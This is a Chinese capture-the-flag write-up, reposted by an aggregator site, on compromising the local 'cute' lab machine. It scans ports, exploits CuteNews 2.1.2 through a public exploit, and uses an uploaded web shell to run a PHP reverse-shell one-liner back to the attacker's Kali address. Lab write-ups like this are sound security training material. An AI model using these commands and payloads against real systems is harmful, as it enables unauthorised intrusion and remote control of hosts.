脚本宝典收集整理的这篇文章主要介绍了cute,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
将靶机导入后将网络设置为NAT
Kali:192.168.0.102 cute:192.168.0.107使用nmap对靶机进行端口扫描
nmap –A –p- 192.168.0.107
扫描结果显示,靶机开放了22、80、88、110、995等端口。
访问其80端口
利用dirseArch扫描目录
访问index.php
是CuteNews搭建的版本为2.1.2,寻找其公开漏洞
修改exp中的代码,去掉CuteNews目录,因为靶机中安装在网站根目录
制作反弹shell
kali监听本地6666端口
反弹成功。
先sudo -l 查看当前权限
发现用户hping3,尝试提权。 提权失败,换一个思路。 通过简单的切换目录命令,发现无法切换目录,根据exp找到shell文件,在uploads目录下。http://192.168.0.107/uploads/avatar_D2CggyKQYt_D2CggyKQYt.php?cmd=id
接下来反弹shell
192.168.0.107/uploads/avatar_D2CggyKQYt_D2CggyKQYt.php?cmd=php -r'$sock=fsockopen("192.168.0.102",1234);$PRoc=proc_oPEn("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
反弹成功
开启python简单http服务: 提升为交互式shellpython3 –c 'import pty;pty.spawn("/bin/bash")'
不能提权,直接读取flag
以上是脚本宝典为你收集整理的cute全部内容,希望文章能够帮你解决cute所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。